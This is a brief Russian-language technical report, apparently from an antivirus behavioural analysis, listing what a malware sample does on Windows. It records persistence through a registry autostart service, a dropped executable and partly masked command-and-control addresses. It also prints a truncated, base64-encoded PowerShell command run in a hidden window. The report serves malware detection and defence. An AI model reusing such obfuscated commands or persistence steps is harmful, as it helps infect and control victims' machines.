Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\C_IS2022] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\C_IS2022] 'ImagePath' = '"<SYSTEM32>\WWanHC\C_IS2022.exe"'
- 'C_IS2022' "<SYSTEM32>\WWanHC\C_IS2022.exe"
- 'C_IS2022' <SYSTEM32>\WWanHC\C_IS2022.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABQAGMAagBuAHcAZwBwAD0AKAAoACcARAAnACsAJwBiAG8AJwApACsAJwAwACcAKwAoACcAcwAnACsAJwB1AGMAJwApACkAOwAuACgAJwBuACcAKwAnAGUAdwAtAGkAJwArACcAdABlAG0AJwApACAAJABFAE4AdgA6AFUAUwBlAFIAcAByAG8ARgBJAE...
- %HOMEPATH%\ctn66fz\mp9t847\k1r4jlz.exe
- <SYSTEM32>\wwanhc\c_is2022.exe
- %HOMEPATH%\ctn66fz\mp9t847\k1r4jlz.exe в <SYSTEM32>\wwanhc\c_is2022.exe
- '18#.#15.227.107':443
- http://ra###submit.com/search_test/s/
- http://18#.##5.227.107:443/2H6VpC9n9aPLOXZnTg/ via 18#.#15.227.107
- DNS ASK ra###submit.com
- '%HOMEPATH%\ctn66fz\mp9t847\k1r4jlz.exe'
- '<SYSTEM32>\wwanhc\c_is2022.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABQAGMAagBuAHcAZwBwAD0AKAAoACcARAAnACsAJwBiAG8AJwApACsAJwAwACcAKwAoACcAcwAnACsAJwB1AGMAJwApACkAOwAuACgAJwBuACcAKwAnAGUAdwAtAGkAJwArACcAdABlAG0AJwApACAAJABFAE4AdgA6AFUAUwBlAFIAcAByAG8ARgBJAE...' (со скрытым окном)